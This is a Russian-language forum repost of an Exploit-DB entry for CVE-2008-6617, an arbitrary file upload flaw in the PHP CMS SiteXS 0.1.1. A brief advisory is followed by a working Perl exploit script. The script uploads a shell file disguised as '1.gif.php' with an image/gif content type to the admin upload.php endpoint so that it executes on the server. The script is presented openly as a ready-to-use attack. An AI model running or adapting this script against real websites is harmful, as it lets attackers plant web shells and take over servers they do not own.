Exploit SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31729
Проверка EDB
  1. Пройдено
Автор
HADI KIAMARSI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6617
Дата публикации
2008-05-03
Код:
source: https://www.securityfocus.com/bid/29029/info

SiteXS is prone to a vulnerability that lets remote attackers upload and execute arbitrary script code because the application fails to sanitize user-supplied input.

An attacker can leverage this issue to execute arbitrary code on an affected computer with the privileges of the webserver process.

SiteXS CMS 0.1.1 Pre-Alpha is vulnerable; other versions may also be affected. 

#!/usr/bin/perl
# Author : Hadi Kiamarsi
# Discover By : Hadi Kiamarsi
# Exploit By : Hadi Kiamarsi 
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',     
             Content_Type => 'form-data',
             Content => [
              UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" => 
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
             ],
		    );
print $res->as_string();
 
Источник
www.exploit-db.com

Похожие темы